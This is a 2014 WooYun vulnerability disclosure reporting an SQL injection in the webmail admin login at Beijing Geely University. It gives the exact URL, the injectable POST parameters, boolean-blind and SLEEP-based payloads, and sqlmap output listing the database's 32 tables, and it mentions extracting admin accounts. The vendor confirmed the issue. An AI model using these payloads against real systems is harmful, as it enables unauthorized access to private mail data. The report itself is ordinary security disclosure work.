当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053888

漏洞标题:北京吉利大学某重要内部系统注入漏洞

相关厂商:bgu.edu.cn

漏洞作者: Mr .LZH

提交时间:2014-03-17 17:50

修复时间:2014-05-01 17:51

公开时间:2014-05-01 17:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-17: 细节已通知厂商并且等待厂商处理中
2014-03-17: 厂商已经确认,细节仅向厂商公开
2014-03-27: 细节向核心白帽子及相关领域专家公开
2014-04-06: 细节向普通白帽子公开
2014-04-16: 细节向实习白帽子公开
2014-05-01: 细节向公众公开

简要描述:

北京吉利大学某重要内部系统注入漏洞。通用型系统,新版本不存在注入问题,老版本存在,谷歌关键字显示老版本用户现在很少,不超过1000,既然用户少,就不发通用型漏洞了。直接给北京吉利大学报平安。PS:看到北京吉利大学发礼物就赶来了,没想到撞到大系统。

详细说明:

后台管理登录框存在注入。
漏洞地址:mail.bgu.edu.cn:80/webmail/admin/index.php?action=login&module=user&return=/webmail/admin/
post数据:domain=bgu.edu.cn&password=test&username=test
注入参数:domain,username

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: domain
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: domain=bgu.edu.cn' AND 8760=8760 AND 'yeJu'='yeJu&password=e&username=e
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: domain=bgu.edu.cn' AND SLEEP(5) AND 'LRQG'='LRQG&password=e&username=e
---
Database: umail
[32 tables]
+---------------------+
| admin_domain_prefs |
| admin_log |
| admin_users |
| client_calendar |
| client_fetchmail |
| client_letter_paper |
| client_nd_files |
| client_nd_folder |
| client_note_cate |
| client_note_content |
| client_pab_contact |
| client_pab_group |
| client_pab_map |
| client_score_stat |
| client_score_type |
| client_signature |
| client_user_apply |
| client_user_info |
| client_user_prefs |
| collect |
| company_department |
| company_dept_map |
| company_dept_permit |
| company_info |
| core_alias |
| core_alias_domain |
| core_domain |
| core_mailbox |
| core_maillist |
| core_members |
| core_replylog |
| core_response |
+---------------------+


先爆个管理用户,看看后台:

QQ截图20140317163448.png


再爆一下管理员他的邮箱:

QQ截图20140317163412.png

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: domain
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: domain=bgu.edu.cn' AND 8760=8760 AND 'yeJu'='yeJu&password=e&username=e
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: domain=bgu.edu.cn' AND SLEEP(5) AND 'LRQG'='LRQG&password=e&username=e
---
Database: umail
[32 tables]
+---------------------+
| admin_domain_prefs |
| admin_log |
| admin_users |
| client_calendar |
| client_fetchmail |
| client_letter_paper |
| client_nd_files |
| client_nd_folder |
| client_note_cate |
| client_note_content |
| client_pab_contact |
| client_pab_group |
| client_pab_map |
| client_score_stat |
| client_score_type |
| client_signature |
| client_user_apply |
| client_user_info |
| client_user_prefs |
| collect |
| company_department |
| company_dept_map |
| company_dept_permit |
| company_info |
| core_alias |
| core_alias_domain |
| core_domain |
| core_mailbox |
| core_maillist |
| core_members |
| core_replylog |
| core_response |
+---------------------+


QQ截图20140317163448.png


QQ截图20140317163412.png

修复方案:

更新版本
拒绝小厂商

版权声明:转载请注明来源 Mr .LZH@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-03-17 20:26

厂商回复:

非常感谢,我们会尽快修复该漏洞!

最新状态:

暂无